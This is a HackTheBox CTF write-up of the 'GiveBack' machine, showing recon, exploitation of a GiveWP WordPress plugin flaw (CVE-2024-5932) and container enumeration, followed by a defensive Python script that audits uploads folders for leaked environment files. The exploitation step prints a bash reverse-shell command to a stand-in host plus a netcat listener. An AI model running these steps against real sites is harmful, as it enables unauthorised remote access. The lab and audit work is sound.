HackTheBox - GiveBack Writeup

Difficulty: Medium
OS: Linux


Reconnaissance

Nmap Scan

nmap -sC -sV -p- giveback.htb

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_  256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open  http    nginx 1.28.0
|_http-generator: WordPress 6.8.1
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.28.0
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI

Key Findings:

  • SSH on port 22
  • WordPress 6.8.1 running on nginx 1.28.0
  • Domain: giveback.htb

Initial Access - WordPress Exploitation

WordPress Enumeration

wpscan --url http://giveback.htb

Discovery: wpscan shows that the site runs the GiveWP donation plugin, and the installed version is vulnerable to CVE-2024-5932.

Exploiting CVE-2024-5932 (GiveWP RCE)

Exploit Repository: CVE-2024-5932

Setup:

cd CVE-2024-5932
pip install -r requirements.txt

Start Listener:

nc -lvnp 1234

Execute Exploit:

python3 CVE-2024-5932-rce.py \
  -u "http://giveback.htb/donations/the-things-we-need/" \
  -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/1234 0>&1'" 2>&1 | tail -15

Result: Reverse shell obtained!


Container Enumeration

Environment File Discovery

cat /opt/bitnami/wordpress/wp-content/uploads/env.txt

Key Findings:

BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241

Important Discovery: The LEGACY_INTRANET_SERVICE_SERVICE_HOST variable points to another container, reachable at 10.43.2.241:5000.
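The env.txt file above was sitting in wp-content/uploads, a directory nginx serves to anyone, so a container environment dump became a map of the internal network. The following Python script is an added example for the defensive side of this finding; it is not part of the writeup or of any WordPress tooling. It walks an uploads tree, reports every file that is not an expected media type, and parses KEY=VALUE content so that leaked *_SERVICE_HOST style variables are called out explicitly. The sample tree it builds is constructed for the demonstration (the two addresses are the ones quoted above), and the helper names, extension list and key pattern are this example's own choices.

```python
import re
import tempfile
from pathlib import Path

# Extensions a WordPress uploads tree is expected to contain (assumption for this example).
MEDIA_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp", ".svg",
                    ".pdf", ".mp4", ".mp3", ".ico", ".avif"}

# KEY=VALUE lines, as produced when a container's environment is dumped to a file.
ENV_LINE = re.compile(r"^([A-Z][A-Z0-9_]*)=(.*)$")
# Variable names that usually carry secrets or internal topology (heuristic, not exhaustive).
SENSITIVE_KEY = re.compile(r"(PASSWORD|SECRET|TOKEN|KEY|_SERVICE_HOST|_SERVICE_PORT)")


def parse_env_lines(text):
    """Return {name: value} for every KEY=VALUE line in text (hypothetical helper)."""
    found = {}
    for line in text.splitlines():
        match = ENV_LINE.match(line.strip())
        if match:
            found[match.group(1)] = match.group(2)
    return found


def audit_uploads(uploads_dir):
    """Walk uploads_dir and report files that should never be web-served from a media directory.

    Each finding is {"path", "reason", "env"}; "env" holds sensitive variables when the
    file looks like an environment dump.
    """
    uploads_dir = Path(uploads_dir)
    findings = []
    for path in sorted(uploads_dir.rglob("*")):
        if not path.is_file():
            continue
        ext = path.suffix.lower()
        if ext in MEDIA_EXTENSIONS:
            continue  # ordinary media upload, nothing to report
        finding = {
            "path": path.relative_to(uploads_dir).as_posix(),
            "reason": f"non-media file ({ext or 'no extension'}) in uploads",
            "env": {},
        }
        try:
            text = path.read_text(errors="replace")
        except OSError:
            text = ""
        leaked = {k: v for k, v in parse_env_lines(text).items() if SENSITIVE_KEY.search(k)}
        if leaked:
            finding["reason"] = "environment dump exposing internal services or secrets"
            finding["env"] = leaked
        findings.append(finding)
    return findings


def build_sample_uploads():
    """Create a constructed uploads tree modelled on the writeup's layout (sample data, not real)."""
    root = Path(tempfile.mkdtemp(prefix="wp-uploads-"))
    (root / "2025" / "01").mkdir(parents=True)
    (root / "2025" / "01" / "banner.png").write_bytes(b"\x89PNG\r\n\x1a\n")
    # Constructed env dump; the two service addresses are the ones quoted in the writeup.
    (root / "env.txt").write_text(
        "PATH=/usr/local/bin\n"
        "BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82\n"
        "LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241\n"
    )
    # A stray script in uploads is the other classic thing this audit should surface.
    (root / "stray.php").write_text("<?php echo 'placeholder'; ?>\n")
    return root


if __name__ == "__main__":
    for item in audit_uploads(build_sample_uploads()):
        print(f"{item['path']}: {item['reason']}")
        for name, value in item["env"].items():
            print(f"    {name}={value}")
```

Run against a real installation with `audit_uploads("/opt/bitnami/wordpress/wp-content/uploads")` (the path from the writeup). The same heuristic is a reasonable periodic check on any site that accepts uploads; the structural fix is to keep runtime environment out of the document root entirely and to have the web server refuse to serve anything but media from the uploads location.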